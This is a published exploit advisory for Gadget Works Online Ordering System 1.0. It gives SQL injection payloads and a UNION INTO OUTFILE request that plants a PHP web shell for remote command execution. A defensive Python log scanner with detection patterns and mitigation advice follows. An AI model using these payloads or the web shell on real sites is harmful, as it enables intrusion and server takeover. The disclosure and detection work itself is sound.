Authored by Richard Jones

Gadget Works Online Ordering System version 1.0 remote SQL injection to remote code execution exploit.

# Exploit Title: Gadget works online ordering system - Authentication Bypass SQLi
# Date: 03/05/2021
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/13093/gadget-works-online-ordering-system-phpmysqli.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

SQL Injection details:

Endpoint:
*replace IP with the website's IP

http://IP/philosophy/index.php?q=single-item&id=1

Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: q=single-item&id=(SELECT (CASE WHEN (5628=5628) THEN 1 ELSE (SELECT 9686 UNION SELECT 8857) END))

Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: q=single-item&id=1 OR (SELECT 3320 FROM(SELECT COUNT(*),CONCAT(0x71787a7671,(SELECT (ELT(3320=3320,1))),0x716a706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: q=single-item&id=1 AND (SELECT 2585 FROM (SELECT(SLEEP(5)))BrmF)

Type: UNION query
Title: Generic UNION query (NULL) - 20 columns
Payload: q=single-item&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71787a7671,0x67664845794943545a51517775675672466965636572474d435a48727a58646750687253474d766d,0x716a706271),NULL-- -


SQL Injection to RCE

*replace IP with the website's IP

http://IP/philosophy/index.php?q=single-item&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,"<%3fphp+echo+shell_exec($_GET['cmd'])%3b%3f>",NULL+into+outfile+"C%3axampphtdocsbackdoor.php"--+-
RCE execution point:
http://IP/backdoor.php?cmd=whoami
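Added defender-side example, not part of the advisory and not code from the Gadget Works project: a small Python scanner that applies the request shapes listed above (UNION ... SELECT, SLEEP(), CASE WHEN, FLOOR(RAND()), CONCAT with hex markers, INTO OUTFILE, and a PHP tag inside a query string) to web-server access logs, and additionally flags any non-integer value in a parameter that the application only ever uses as a number. The log lines are constructed for the example, and the assumption that `id` is integer-only is ours, not a documented property of the application.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined-log style); the query strings
# mirror the payload shapes in the advisory but are not copied from a real server.
SAMPLE_LOG = """\
203.0.113.5 - - [03/May/2021:10:01:02 +0000] "GET /philosophy/index.php?q=single-item&id=1 HTTP/1.1" 200 5120
203.0.113.5 - - [03/May/2021:10:01:09 +0000] "GET /philosophy/index.php?q=single-item&id=1+AND+(SELECT+2585+FROM+(SELECT(SLEEP(5)))BrmF) HTTP/1.1" 200 5120
203.0.113.5 - - [03/May/2021:10:01:15 +0000] "GET /philosophy/index.php?q=single-item&id=1+UNION+ALL+SELECT+NULL,NULL,CONCAT(0x71787a7671,0x6766,0x716a706271),NULL--+- HTTP/1.1" 200 5120
203.0.113.5 - - [03/May/2021:10:01:20 +0000] "GET /philosophy/index.php?q=single-item&id=1+UNION+ALL+SELECT+NULL,%22%3C%3Fphp+echo+1%3B%3F%3E%22+into+outfile+%22C%3A%5Cxampp%5Chtdocs%5Cx.php%22--+- HTTP/1.1" 200 5120
203.0.113.5 - - [03/May/2021:10:01:25 +0000] "GET /backdoor.php?cmd=whoami HTTP/1.1" 200 12
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures matched against each decoded parameter value (case-insensitive).
SQLI_SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("time-based-sleep", re.compile(r"\bsleep\s*\(", re.I)),
    ("boolean-case", re.compile(r"\bcase\s+when\b", re.I)),
    ("error-based-floor-rand", re.compile(r"\bfloor\s*\(\s*rand\s*\(", re.I)),
    ("hex-marker-concat", re.compile(r"\bconcat\s*\(\s*0x[0-9a-f]+", re.I)),
    ("file-write", re.compile(r"\binto\s+(?:out|dump)file\b", re.I)),
    ("php-tag-in-query", re.compile(r"<\?php", re.I)),
]

# Assumption for this example: the application only ever treats `id` as an integer,
# so any other content in it is anomalous regardless of signature matches.
NUMERIC_PARAMS = {"id"}


def decode_query(target):
    """Return the decoded query parameters of a request target.

    parse_qs decodes both %XX escapes and '+' as space, which is how the
    payloads in the advisory are delivered on the wire.
    """
    return parse_qs(urlsplit(target).query, keep_blank_values=True)


def classify_request(target):
    """Return an ordered, de-duplicated list of indicator labels for one request."""
    hits = []
    for name, values in decode_query(target).items():
        for value in values:
            if name in NUMERIC_PARAMS and not value.strip().isdigit():
                hits.append(f"non-numeric-{name}")
            for label, pattern in SQLI_SIGNATURES:
                if pattern.search(value):
                    hits.append(label)
    return list(dict.fromkeys(hits))


def scan_log(text):
    """Return (client_ip, path, indicators) for every log line that triggers at least one indicator."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a combined-log line; skip rather than guess
        hits = classify_request(match["target"])
        if hits:
            findings.append((match["ip"], match["target"].split("?", 1)[0], hits))
    return findings


if __name__ == "__main__":
    for ip, path, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {path}: {', '.join(hits)}")
```

Note what the scanner does not catch: the final `backdoor.php?cmd=whoami` request in the sample is an ordinary GET with no SQL in it and produces no finding. Detecting that stage depends on file-integrity monitoring of the web root (a new `.php` file appearing there) and, better, on preventing the write in the first place: the application's database account should not hold the MySQL `FILE` privilege, and `secure_file_priv` should not point at a web-served directory. On the application side, the `id` parameter should be bound with a prepared statement (or cast to an integer) rather than concatenated into the query.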